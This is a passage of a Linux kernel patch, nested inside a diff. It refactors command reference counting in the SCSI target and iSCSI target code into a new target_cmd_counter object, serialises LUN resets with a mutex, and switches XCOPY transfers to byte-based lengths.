+@@ -4228,11 +4233,10 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 				 */
+ 				list_move_tail(&cmd->i_conn_node,
+ 					       &conn->conn_cmd_list);
+-			} else {
+-				se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+-			}
+-			spin_unlock_irq(&se_cmd->t_state_lock);
++		} else {
++			se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+ 		}
++		spin_unlock_irq(&se_cmd->t_state_lock);
+ 	}
+ 	spin_unlock_bh(&conn->cmd_lock);
+ 
+@@ -4243,6 +4247,16 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 		iscsit_free_cmd(cmd, true);
+ 
+ 	}
++
++	/*
++	 * Wait on commands that were cleaned up via the aborted_task path.
++	 * LLDs that implement iscsit_wait_conn will already have waited for
++	 * commands.
++	 */
++	if (!conn->conn_transport->iscsit_wait_conn) {
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
++	}
+ }
+ 
+ static void iscsit_stop_timers_for_cmds(
+diff --git a/drivers/target/iscsi/iscsi_target_login.c b/drivers/target/iscsi/iscsi_target_login.c
+index 27e448c2d066c..274bdd7845ca9 100644
+--- a/drivers/target/iscsi/iscsi_target_login.c
++++ b/drivers/target/iscsi/iscsi_target_login.c
+@@ -1147,8 +1147,14 @@ static struct iscsit_conn *iscsit_alloc_conn(struct iscsi_np *np)
+ 		goto free_conn_cpumask;
+ 	}
+ 
++	conn->cmd_cnt = target_alloc_cmd_counter();
++	if (!conn->cmd_cnt)
++		goto free_conn_allowed_cpumask;
++
+ 	return conn;
+ 
++free_conn_allowed_cpumask:
++	free_cpumask_var(conn->allowed_cpumask);
+ free_conn_cpumask:
+ 	free_cpumask_var(conn->conn_cpumask);
+ free_conn_ops:
+@@ -1162,6 +1168,7 @@ free_conn:
+ 
+ void iscsit_free_conn(struct iscsit_conn *conn)
+ {
++	target_free_cmd_counter(conn->cmd_cnt);
+ 	free_cpumask_var(conn->allowed_cpumask);
+ 	free_cpumask_var(conn->conn_cpumask);
+ 	kfree(conn->conn_ops);
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index cb4f7cc02f8fa..d21f88de197c7 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -782,6 +782,7 @@ struct se_device *target_alloc_device(struct se_hba *hba, const char *name)
+ 	spin_lock_init(&dev->t10_alua.lba_map_lock);
+ 
+ 	INIT_WORK(&dev->delayed_cmd_work, target_do_delayed_work);
++	mutex_init(&dev->lun_reset_mutex);
+ 
+ 	dev->t10_wwn.t10_dev = dev;
+ 	/*
+diff --git a/drivers/target/target_core_internal.h b/drivers/target/target_core_internal.h
+index 38a6d08f75b34..85e35cf582e50 100644
+--- a/drivers/target/target_core_internal.h
++++ b/drivers/target/target_core_internal.h
+@@ -138,7 +138,6 @@ int	init_se_kmem_caches(void);
+ void	release_se_kmem_caches(void);
+ u32	scsi_get_new_index(scsi_index_t);
+ void	transport_subsystem_check_init(void);
+-void	transport_uninit_session(struct se_session *);
+ unsigned char *transport_dump_cmd_direction(struct se_cmd *);
+ void	transport_dump_dev_state(struct se_device *, char *, int *);
+ void	transport_dump_dev_info(struct se_device *, struct se_lun *,
+diff --git a/drivers/target/target_core_tmr.c b/drivers/target/target_core_tmr.c
+index 2b95b4550a637..4718db628222b 100644
+--- a/drivers/target/target_core_tmr.c
++++ b/drivers/target/target_core_tmr.c
+@@ -188,14 +188,23 @@ static void core_tmr_drain_tmr_list(
+ 	 * LUN_RESET tmr..
+ 	 */
+ 	spin_lock_irqsave(&dev->se_tmr_lock, flags);
+-	if (tmr)
+-		list_del_init(&tmr->tmr_list);
+ 	list_for_each_entry_safe(tmr_p, tmr_pp, &dev->dev_tmr_list, tmr_list) {
++		if (tmr_p == tmr)
++			continue;
++
+ 		cmd = tmr_p->task_cmd;
+ 		if (!cmd) {
+ 			pr_err("Unable to locate struct se_cmd for TMR\n");
+ 			continue;
+ 		}
++
++		/*
++		 * We only execute one LUN_RESET at a time so we can't wait
++		 * on them below.
++		 */
++		if (tmr_p->function == TMR_LUN_RESET)
++			continue;
++
+ 		/*
+ 		 * If this function was called with a valid pr_res_key
+ 		 * parameter (eg: for PROUT PREEMPT_AND_ABORT service action
+@@ -379,14 +388,25 @@ int core_tmr_lun_reset(
+ 				tmr_nacl->initiatorname);
+ 		}
+ 	}
++
++
++	/*
++	 * We only allow one reset or preempt and abort to execute at a time
++	 * to prevent one call from claiming all the cmds causing a second
++	 * call from returning while cmds it should have waited on are still
++	 * running.
++	 */
++	mutex_lock(&dev->lun_reset_mutex);
++
+ 	pr_debug("LUN_RESET: %s starting for [%s], tas: %d\n",
+ 		(preempt_and_abort_list) ? "Preempt" : "TMR",
+ 		dev->transport->name, tas);
+-
+ 	core_tmr_drain_tmr_list(dev, tmr, preempt_and_abort_list);
+ 	core_tmr_drain_state_list(dev, prout_cmd, tmr_sess, tas,
+ 				preempt_and_abort_list);
+ 
++	mutex_unlock(&dev->lun_reset_mutex);
++
+ 	/*
+ 	 * Clear any legacy SPC-2 reservation when called during
+ 	 * LOGICAL UNIT RESET
+diff --git a/drivers/target/target_core_tpg.c b/drivers/target/target_core_tpg.c
+index 736847c933e5c..8ebccdbd94f0e 100644
+--- a/drivers/target/target_core_tpg.c
++++ b/drivers/target/target_core_tpg.c
+@@ -328,7 +328,7 @@ static void target_shutdown_sessions(struct se_node_acl *acl)
+ restart:
+ 	spin_lock_irqsave(&acl->nacl_sess_lock, flags);
+ 	list_for_each_entry(sess, &acl->acl_sess_list, sess_acl_list) {
+-		if (atomic_read(&sess->stopped))
++		if (sess->cmd_cnt && atomic_read(&sess->cmd_cnt->stopped))
+ 			continue;
+ 
+ 		list_del_init(&sess->sess_acl_list);
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 5926316252eb9..86adff2a86edd 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -220,12 +220,52 @@ void transport_subsystem_check_init(void)
+ 	sub_api_initialized = 1;
+ }
+ 
+-static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
++static void target_release_cmd_refcnt(struct percpu_ref *ref)
+ {
+-	struct se_session *sess = container_of(ref, typeof(*sess), cmd_count);
++	struct target_cmd_counter *cmd_cnt  = container_of(ref,
++							   typeof(*cmd_cnt),
++							   refcnt);
++	wake_up(&cmd_cnt->refcnt_wq);
++}
++
++struct target_cmd_counter *target_alloc_cmd_counter(void)
++{
++	struct target_cmd_counter *cmd_cnt;
++	int rc;
++
++	cmd_cnt = kzalloc(sizeof(*cmd_cnt), GFP_KERNEL);
++	if (!cmd_cnt)
++		return NULL;
++
++	init_completion(&cmd_cnt->stop_done);
++	init_waitqueue_head(&cmd_cnt->refcnt_wq);
++	atomic_set(&cmd_cnt->stopped, 0);
+ 
+-	wake_up(&sess->cmd_count_wq);
++	rc = percpu_ref_init(&cmd_cnt->refcnt, target_release_cmd_refcnt, 0,
++			     GFP_KERNEL);
++	if (rc)
++		goto free_cmd_cnt;
++
++	return cmd_cnt;
++
++free_cmd_cnt:
++	kfree(cmd_cnt);
++	return NULL;
+ }
++EXPORT_SYMBOL_GPL(target_alloc_cmd_counter);
++
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt)
++{
++	/*
++	 * Drivers like loop do not call target_stop_session during session
++	 * shutdown so we have to drop the ref taken at init time here.
++	 */
++	if (!atomic_read(&cmd_cnt->stopped))
++		percpu_ref_put(&cmd_cnt->refcnt);
++
++	percpu_ref_exit(&cmd_cnt->refcnt);
++}
++EXPORT_SYMBOL_GPL(target_free_cmd_counter);
+ 
+ /**
+  * transport_init_session - initialize a session object
+@@ -233,32 +273,14 @@ static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
+  *
+  * The caller must have zero-initialized @se_sess before calling this function.
+  */
+-int transport_init_session(struct se_session *se_sess)
++void transport_init_session(struct se_session *se_sess)
+ {
+ 	INIT_LIST_HEAD(&se_sess->sess_list);
+ 	INIT_LIST_HEAD(&se_sess->sess_acl_list);
+ 	spin_lock_init(&se_sess->sess_cmd_lock);
+-	init_waitqueue_head(&se_sess->cmd_count_wq);
+-	init_completion(&se_sess->stop_done);
+-	atomic_set(&se_sess->stopped, 0);
+-	return percpu_ref_init(&se_sess->cmd_count,
+-			       target_release_sess_cmd_refcnt, 0, GFP_KERNEL);
+ }
+ EXPORT_SYMBOL(transport_init_session);
+ 
+-void transport_uninit_session(struct se_session *se_sess)
+-{
+-	/*
+-	 * Drivers like iscsi and loop do not call target_stop_session
+-	 * during session shutdown so we have to drop the ref taken at init
+-	 * time here.
+-	 */
+-	if (!atomic_read(&se_sess->stopped))
+-		percpu_ref_put(&se_sess->cmd_count);
+-
+-	percpu_ref_exit(&se_sess->cmd_count);
+-}
+-
+ /**
+  * transport_alloc_session - allocate a session object and initialize it
+  * @sup_prot_ops: bitmask that defines which T10-PI modes are supported.
+@@ -266,7 +288,6 @@ void transport_uninit_session(struct se_session *se_sess)
+ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ {
+ 	struct se_session *se_sess;
+-	int ret;
+ 
+ 	se_sess = kmem_cache_zalloc(se_sess_cache, GFP_KERNEL);
+ 	if (!se_sess) {
+@@ -274,11 +295,7 @@ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ 				" se_sess_cache\n");
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+-	ret = transport_init_session(se_sess);
+-	if (ret < 0) {
+-		kmem_cache_free(se_sess_cache, se_sess);
+-		return ERR_PTR(ret);
+-	}
++	transport_init_session(se_sess);
+ 	se_sess->sup_prot_ops = sup_prot_ops;
+ 
+ 	return se_sess;
+@@ -444,8 +461,13 @@ target_setup_session(struct se_portal_group *tpg,
+ 		     int (*callback)(struct se_portal_group *,
+ 				     struct se_session *, void *))
+ {
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_session *sess;
++	int rc;
+ 
++	cmd_cnt = target_alloc_cmd_counter();
++	if (!cmd_cnt)
++		return ERR_PTR(-ENOMEM);
+ 	/*
+ 	 * If the fabric driver is using percpu-ida based pre allocation
+ 	 * of I/O descriptor tags, go ahead and perform that setup now..
+@@ -455,29 +477,36 @@ target_setup_session(struct se_portal_group *tpg,
+ 	else
+ 		sess = transport_alloc_session(prot_op);
+ 
+-	if (IS_ERR(sess))
+-		return sess;
++	if (IS_ERR(sess)) {
++		rc = PTR_ERR(sess);
++		goto free_cnt;
++	}
++	sess->cmd_cnt = cmd_cnt;
+ 
+ 	sess->se_node_acl = core_tpg_check_initiator_node_acl(tpg,
+ 					(unsigned char *)initiatorname);
+ 	if (!sess->se_node_acl) {
+-		transport_free_session(sess);
+-		return ERR_PTR(-EACCES);
++		rc = -EACCES;
++		goto free_sess;
+ 	}
+ 	/*
+ 	 * Go ahead and perform any remaining fabric setup that is
+ 	 * required before transport_register_session().
+ 	 */
+ 	if (callback != NULL) {
+-		int rc = callback(tpg, sess, private);
+-		if (rc) {
+-			transport_free_session(sess);
+-			return ERR_PTR(rc);
+-		}
++		rc = callback(tpg, sess, private);
++		if (rc)
++			goto free_sess;
+ 	}
+ 
+ 	transport_register_session(tpg, sess->se_node_acl, sess, private);
+ 	return sess;
++
++free_sess:
++	transport_free_session(sess);
++free_cnt:
++	target_free_cmd_counter(cmd_cnt);
++	return ERR_PTR(rc);
+ }
+ EXPORT_SYMBOL(target_setup_session);
+ 
+@@ -602,7 +631,8 @@ void transport_free_session(struct se_session *se_sess)
+ 		sbitmap_queue_free(&se_sess->sess_tag_pool);
+ 		kvfree(se_sess->sess_cmd_map);
+ 	}
+-	transport_uninit_session(se_sess);
++	if (se_sess->cmd_cnt)
++		target_free_cmd_counter(se_sess->cmd_cnt);
+ 	kmem_cache_free(se_sess_cache, se_sess);
+ }
+ EXPORT_SYMBOL(transport_free_session);
+@@ -1412,14 +1442,12 @@ target_cmd_size_check(struct se_cmd *cmd, unsigned int size)
+  *
+  * Preserves the value of @cmd->tag.
+  */
+-void __target_init_cmd(
+-	struct se_cmd *cmd,
+-	const struct target_core_fabric_ops *tfo,
+-	struct se_session *se_sess,
+-	u32 data_length,
+-	int data_direction,
+-	int task_attr,
+-	unsigned char *sense_buffer, u64 unpacked_lun)
++void __target_init_cmd(struct se_cmd *cmd,
++		       const struct target_core_fabric_ops *tfo,
++		       struct se_session *se_sess, u32 data_length,
++		       int data_direction, int task_attr,
++		       unsigned char *sense_buffer, u64 unpacked_lun,
++		       struct target_cmd_counter *cmd_cnt)
+ {
+ 	INIT_LIST_HEAD(&cmd->se_delayed_node);
+ 	INIT_LIST_HEAD(&cmd->se_qf_node);
+@@ -1439,6 +1467,7 @@ void __target_init_cmd(
+ 	cmd->sam_task_attr = task_attr;
+ 	cmd->sense_buffer = sense_buffer;
+ 	cmd->orig_fe_lun = unpacked_lun;
++	cmd->cmd_cnt = cmd_cnt;
+ 
+ 	if (!(cmd->se_cmd_flags & SCF_USE_CPUID))
+ 		cmd->cpuid = raw_smp_processor_id();
+@@ -1658,7 +1687,8 @@ int target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	 * target_core_fabric_ops->queue_status() callback
+ 	 */
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess, data_length,
+-			  data_dir, task_attr, sense, unpacked_lun);
++			  data_dir, task_attr, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 
+ 	/*
+ 	 * Obtain struct se_cmd->cmd_kref reference. A second kref_get here is
+@@ -1953,7 +1983,8 @@ int target_submit_tmr(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	BUG_ON(!se_tpg);
+ 
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess,
+-			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun);
++			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 	/*
+ 	 * FIXME: Currently expect caller to handle se_cmd->se_tmr_req
+ 	 * allocation failure.
+@@ -2957,7 +2988,6 @@ EXPORT_SYMBOL(transport_generic_free_cmd);
+  */
+ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ {
+-	struct se_session *se_sess = se_cmd->se_sess;
+ 	int ret = 0;
+ 
+ 	/*
+@@ -2970,9 +3000,14 @@ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ 		se_cmd->se_cmd_flags |= SCF_ACK_KREF;
+ 	}
+ 
+-	if (!percpu_ref_tryget_live(&se_sess->cmd_count))
+-		ret = -ESHUTDOWN;
+-
++	/*
++	 * Users like xcopy do not use counters since they never do a stop
++	 * and wait.
++	 */
++	if (se_cmd->cmd_cnt) {
++		if (!percpu_ref_tryget_live(&se_cmd->cmd_cnt->refcnt))
++			ret = -ESHUTDOWN;
++	}
+ 	if (ret && ack_kref)
+ 		target_put_sess_cmd(se_cmd);
+ 
+@@ -2993,7 +3028,7 @@ static void target_free_cmd_mem(struct se_cmd *cmd)
+ static void target_release_cmd_kref(struct kref *kref)
+ {
+ 	struct se_cmd *se_cmd = container_of(kref, struct se_cmd, cmd_kref);
+-	struct se_session *se_sess = se_cmd->se_sess;
++	struct target_cmd_counter *cmd_cnt = se_cmd->cmd_cnt;
+ 	struct completion *free_compl = se_cmd->free_compl;
+ 	struct completion *abrt_compl = se_cmd->abrt_compl;
+ 
+@@ -3004,7 +3039,8 @@ static void target_release_cmd_kref(struct kref *kref)
+ 	if (abrt_compl)
+ 		complete(abrt_compl);
+ 
+-	percpu_ref_put(&se_sess->cmd_count);
++	if (cmd_cnt)
++		percpu_ref_put(&cmd_cnt->refcnt);
+ }
+ 
+ /**
+@@ -3123,46 +3159,67 @@ void target_show_cmd(const char *pfx, struct se_cmd *cmd)
+ }
+ EXPORT_SYMBOL(target_show_cmd);
+ 
+-static void target_stop_session_confirm(struct percpu_ref *ref)
++static void target_stop_cmd_counter_confirm(struct percpu_ref *ref)
++{
++	struct target_cmd_counter *cmd_cnt = container_of(ref,
++						struct target_cmd_counter,
++						refcnt);
++	complete_all(&cmd_cnt->stop_done);
++}
++
++/**
++ * target_stop_cmd_counter - Stop new IO from being added to the counter.
++ * @cmd_cnt: counter to stop
++ */
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt)
+ {
+-	struct se_session *se_sess = container_of(ref, struct se_session,
+-						  cmd_count);
+-	complete_all(&se_sess->stop_done);
++	pr_debug("Stopping command counter.\n");
++	if (!atomic_cmpxchg(&cmd_cnt->stopped, 0, 1))
++		percpu_ref_kill_and_confirm(&cmd_cnt->refcnt,
++					    target_stop_cmd_counter_confirm);
+ }
++EXPORT_SYMBOL_GPL(target_stop_cmd_counter);
+ 
+ /**
+  * target_stop_session - Stop new IO from being queued on the session.
+- * @se_sess:    session to stop
++ * @se_sess: session to stop
+  */
+ void target_stop_session(struct se_session *se_sess)
+ {
+-	pr_debug("Stopping session queue.\n");
+-	if (atomic_cmpxchg(&se_sess->stopped, 0, 1) == 0)
+-		percpu_ref_kill_and_confirm(&se_sess->cmd_count,
+-					    target_stop_session_confirm);
++	target_stop_cmd_counter(se_sess->cmd_cnt);
+ }
+ EXPORT_SYMBOL(target_stop_session);
+ 
+ /**
+- * target_wait_for_sess_cmds - Wait for outstanding commands
+- * @se_sess:    session to wait for active I/O
++ * target_wait_for_cmds - Wait for outstanding cmds.
++ * @cmd_cnt: counter to wait for active I/O for.
+  */
+-void target_wait_for_sess_cmds(struct se_session *se_sess)
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt)
+ {
+ 	int ret;
+ 
+-	WARN_ON_ONCE(!atomic_read(&se_sess->stopped));
++	WARN_ON_ONCE(!atomic_read(&cmd_cnt->stopped));
+ 
+ 	do {
+ 		pr_debug("Waiting for running cmds to complete.\n");
+-		ret = wait_event_timeout(se_sess->cmd_count_wq,
+-				percpu_ref_is_zero(&se_sess->cmd_count),
+-				180 * HZ);
++		ret = wait_event_timeout(cmd_cnt->refcnt_wq,
++					 percpu_ref_is_zero(&cmd_cnt->refcnt),
++					 180 * HZ);
+ 	} while (ret <= 0);
+ 
+-	wait_for_completion(&se_sess->stop_done);
++	wait_for_completion(&cmd_cnt->stop_done);
+ 	pr_debug("Waiting for cmds done.\n");
+ }
++EXPORT_SYMBOL_GPL(target_wait_for_cmds);
++
++/**
++ * target_wait_for_sess_cmds - Wait for outstanding commands
++ * @se_sess: session to wait for active I/O
++ */
++void target_wait_for_sess_cmds(struct se_session *se_sess)
++{
++	target_wait_for_cmds(se_sess->cmd_cnt);
++}
+ EXPORT_SYMBOL(target_wait_for_sess_cmds);
+ 
+ /*
+diff --git a/drivers/target/target_core_xcopy.c b/drivers/target/target_core_xcopy.c
+index 8713cda0c2fb5..d2900d3751516 100644
+--- a/drivers/target/target_core_xcopy.c
++++ b/drivers/target/target_core_xcopy.c
+@@ -461,8 +461,6 @@ static const struct target_core_fabric_ops xcopy_pt_tfo = {
+ 
+ int target_xcopy_setup_pt(void)
+ {
+-	int ret;
+-
+ 	xcopy_wq = alloc_workqueue("xcopy_wq", WQ_MEM_RECLAIM, 0);
+ 	if (!xcopy_wq) {
+ 		pr_err("Unable to allocate xcopy_wq\n");
+@@ -479,9 +477,7 @@ int target_xcopy_setup_pt(void)
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_list);
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_sess_list);
+ 	memset(&xcopy_pt_sess, 0, sizeof(struct se_session));
+-	ret = transport_init_session(&xcopy_pt_sess);
+-	if (ret < 0)
+-		goto destroy_wq;
++	transport_init_session(&xcopy_pt_sess);
+ 
+ 	xcopy_pt_nacl.se_tpg = &xcopy_pt_tpg;
+ 	xcopy_pt_nacl.nacl_sess = &xcopy_pt_sess;
+@@ -490,19 +486,12 @@ int target_xcopy_setup_pt(void)
+ 	xcopy_pt_sess.se_node_acl = &xcopy_pt_nacl;
+ 
+ 	return 0;
+-
+-destroy_wq:
+-	destroy_workqueue(xcopy_wq);
+-	xcopy_wq = NULL;
+-	return ret;
+ }
+ 
+ void target_xcopy_release_pt(void)
+ {
+-	if (xcopy_wq) {
++	if (xcopy_wq)
+ 		destroy_workqueue(xcopy_wq);
+-		transport_uninit_session(&xcopy_pt_sess);
+-	}
+ }
+ 
+ /*
+@@ -582,11 +571,11 @@ static int target_xcopy_read_source(
+ 	struct xcopy_op *xop,
+ 	struct se_device *src_dev,
+ 	sector_t src_lba,
+-	u32 src_sectors)
++	u32 src_bytes)
+ {
+ 	struct xcopy_pt_cmd xpt_cmd;
+ 	struct se_cmd *se_cmd = &xpt_cmd.se_cmd;
+-	u32 length = (src_sectors * src_dev->dev_attrib.block_size);
++	u32 transfer_length_block = src_bytes / src_dev->dev_attrib.block_size;
+ 	int rc;
+ 	unsigned char cdb[16];
+ 	bool remote_port = (xop->op_origin == XCOL_DEST_RECV_OP);
+@@ -597,13 +586,13 @@ static int target_xcopy_read_source(
+ 	memset(&cdb[0], 0, 16);
+ 	cdb[0] = READ_16;
+ 	put_unaligned_be64(src_lba, &cdb[2]);
+-	put_unaligned_be32(src_sectors, &cdb[10]);
+-	pr_debug("XCOPY: Built READ_16: LBA: %llu Sectors: %u Length: %u\n",
+-		(unsigned long long)src_lba, src_sectors, length);
+-
+-	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, length,
+-			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
++	put_unaligned_be32(transfer_length_block, &cdb[10]);
++	pr_debug("XCOPY: Built READ_16: LBA: %llu Blocks: %u Length: %u\n",
++		(unsigned long long)src_lba, transfer_length_block, src_bytes);
+ 
++	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, src_bytes,
++			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, src_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+@@ -627,11 +616,11 @@ static int target_xcopy_write_destination(
+ 	struct xcopy_op *xop,
+ 	struct se_device *dst_dev,
+ 	sector_t dst_lba,
+-	u32 dst_sectors)
++	u32 dst_bytes)
+ {
+ 	struct xcopy_pt_cmd xpt_cmd;
+ 	struct se_cmd *se_cmd = &xpt_cmd.se_cmd;
+-	u32 length = (dst_sectors * dst_dev->dev_attrib.block_size);
++	u32 transfer_length_block = dst_bytes / dst_dev->dev_attrib.block_size;
+ 	int rc;
+ 	unsigned char cdb[16];
+ 	bool remote_port = (xop->op_origin == XCOL_SOURCE_RECV_OP);
+@@ -642,13 +631,13 @@ static int target_xcopy_write_destination(
+ 	memset(&cdb[0], 0, 16);
+ 	cdb[0] = WRITE_16;
+ 	put_unaligned_be64(dst_lba, &cdb[2]);
+-	put_unaligned_be32(dst_sectors, &cdb[10]);
+-	pr_debug("XCOPY: Built WRITE_16: LBA: %llu Sectors: %u Length: %u\n",
+-		(unsigned long long)dst_lba, dst_sectors, length);
+-
+-	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, length,
+-			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
++	put_unaligned_be32(transfer_length_block, &cdb[10]);
++	pr_debug("XCOPY: Built WRITE_16: LBA: %llu Blocks: %u Length: %u\n",
++		(unsigned long long)dst_lba, transfer_length_block, dst_bytes);
+ 
++	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, dst_bytes,
++			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, dst_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+@@ -670,9 +659,10 @@ static void target_xcopy_do_work(struct work_struct *work)
+ 	struct se_cmd *ec_cmd = xop->xop_se_cmd;
+ 	struct se_device *src_dev, *dst_dev;
+ 	sector_t src_lba, dst_lba, end_lba;
+-	unsigned int max_sectors;
++	unsigned long long max_bytes, max_bytes_src, max_bytes_dst, max_blocks;
+ 	int rc = 0;
+-	unsigned short nolb, max_nolb, copied_nolb = 0;
++	unsigned short nolb;
++	unsigned int copied_bytes = 0;
+ 	sense_reason_t sense_rc;
+ 
+ 	sense_rc = target_parse_xcopy_cmd(xop);
+@@ -691,23 +681,31 @@ static void target_xcopy_do_work(struct work_struct *work)
+ 	nolb = xop->nolb;
+ 	end_lba = src_lba + nolb;
+ 	/*
+-	 * Break up XCOPY I/O into hw_max_sectors sized I/O based on the
+-	 * smallest max_sectors between src_dev + dev_dev, or
++	 * Break up XCOPY I/O into hw_max_sectors * hw_block_size sized
++	 * I/O based on the smallest max_bytes between src_dev + dst_dev
+ 	 */
+-	max_sectors = min(src_dev->dev_attrib.hw_max_sectors,
+-			  dst_dev->dev_attrib.hw_max_sectors);
+-	max_sectors = min_t(u32, max_sectors, XCOPY_MAX_SECTORS);
++	max_bytes_src = (unsigned long long) src_dev->dev_attrib.hw_max_sectors *
++			src_dev->dev_attrib.hw_block_size;
++	max_bytes_dst = (unsigned long long) dst_dev->dev_attrib.hw_max_sectors *
++			dst_dev->dev_attrib.hw_block_size;
++
++	max_bytes = min_t(u64, max_bytes_src, max_bytes_dst);
++	max_bytes = min_t(u64, max_bytes, XCOPY_MAX_BYTES);
+ 
+-	max_nolb = min_t(u16, max_sectors, ((u16)(~0U)));
++	/*
++	 * Using shift instead of the division because otherwise GCC
++	 * generates __udivdi3 that is missing on i386
++	 */
++	max_blocks = max_bytes >> ilog2(src_dev->dev_attrib.block_size);
+ 
+-	pr_debug("target_xcopy_do_work: nolb: %hu, max_nolb: %hu end_lba: %llu\n",
+-			nolb, max_nolb, (unsigned long long)end_lba);
+-	pr_debug("target_xcopy_do_work: Starting src_lba: %llu, dst_lba: %llu\n",
++	pr_debug("%s: nolb: %u, max_blocks: %llu end_lba: %llu\n", __func__,
++			nolb, max_blocks, (unsigned long long)end_lba);
++	pr_debug("%s: Starting src_lba: %llu, dst_lba: %llu\n", __func__,
+ 			(unsigned long long)src_lba, (unsigned long long)dst_lba);
+ 
+-	while (src_lba < end_lba) {
+-		unsigned short cur_nolb = min(nolb, max_nolb);
+-		u32 cur_bytes = cur_nolb * src_dev->dev_attrib.block_size;
++	while (nolb) {
++		u32 cur_bytes = min_t(u64, max_bytes, nolb * src_dev->dev_attrib.block_size);
++		unsigned short cur_nolb = cur_bytes / src_dev->dev_attrib.block_size;
+ 
+ 		if (cur_bytes != xop->xop_data_bytes) {
+ 			/*
+@@ -724,43 +722,43 @@ static void target_xcopy_do_work(struct work_struct *work)
+ 			xop->xop_data_bytes = cur_bytes;
+ 		}
+ 
+-		pr_debug("target_xcopy_do_work: Calling read src_dev: %p src_lba: %llu,"
+-			" cur_nolb: %hu\n", src_dev, (unsigned long long)src_lba, cur_nolb);
++		pr_debug("%s: Calling read src_dev: %p src_lba: %llu, cur_nolb: %hu\n",
++				__func__, src_dev, (unsigned long long)src_lba, cur_nolb);
+ 
+-		rc = target_xcopy_read_source(ec_cmd, xop, src_dev, src_lba, cur_nolb);
++		rc = target_xcopy_read_source(ec_cmd, xop, src_dev, src_lba, cur_bytes);
+ 		if (rc < 0)
+ 			goto out;
+ 
+-		src_lba += cur_nolb;
+-		pr_debug("target_xcopy_do_work: Incremented READ src_lba to %llu\n",
++		src_lba += cur_bytes / src_dev->dev_attrib.block_size;
++		pr_debug("%s: Incremented READ src_lba to %llu\n", __func__,
+ 				(unsigned long long)src_lba);
+ 
+-		pr_debug("target_xcopy_do_work: Calling write dst_dev: %p dst_lba: %llu,"
+-			" cur_nolb: %hu\n", dst_dev, (unsigned long long)dst_lba, cur_nolb);
++		pr_debug("%s: Calling write dst_dev: %p dst_lba: %llu, cur_nolb: %u\n",
++				__func__, dst_dev, (unsigned long long)dst_lba, cur_nolb);
+ 
+ 		rc = target_xcopy_write_destination(ec_cmd, xop, dst_dev,
+-						dst_lba, cur_nolb);
++						dst_lba, cur_bytes);
+ 		if (rc < 0)
+ 			goto out;
+ 
+-		dst_lba += cur_nolb;
+-		pr_debug("target_xcopy_do_work: Incremented WRITE dst_lba to %llu\n",
++		dst_lba += cur_bytes / dst_dev->dev_attrib.block_size;
++		pr_debug("%s: Incremented WRITE dst_lba to %llu\n", __func__,
+ 				(unsigned long long)dst_lba);
+ 
+-		copied_nolb += cur_nolb;
+-		nolb -= cur_nolb;
++		copied_bytes += cur_bytes;
++		nolb -= cur_bytes / src_dev->dev_attrib.block_size;
+ 	}
+ 
+ 	xcopy_pt_undepend_remotedev(xop);
+ 	target_free_sgl(xop->xop_data_sg, xop->xop_data_nents);
+ 	kfree(xop);
+ 
+-	pr_debug("target_xcopy_do_work: Final src_lba: %llu, dst_lba: %llu\n",
++	pr_debug("%s: Final src_lba: %llu, dst_lba: %llu\n", __func__,
+ 		(unsigned long long)src_lba, (unsigned long long)dst_lba);
+-	pr_debug("target_xcopy_do_work: Blocks copied: %hu, Bytes Copied: %u\n",
+-		copied_nolb, copied_nolb * dst_dev->dev_attrib.block_size);
++	pr_debug("%s: Blocks copied: %u, Bytes Copied: %u\n", __func__,
++		copied_bytes / dst_dev->dev_attrib.block_size, copied_bytes);
+ 
+-	pr_debug("target_xcopy_do_work: Setting X-COPY GOOD status -> sending response\n");
++	pr_debug("%s: Setting X-COPY GOOD status -> sending response\n", __func__);
+ 	target_complete_cmd(ec_cmd, SAM_STAT_GOOD);
+ 	return;
+ 
+@@ -776,8 +774,8 @@ out:
+ 
+ err_free:
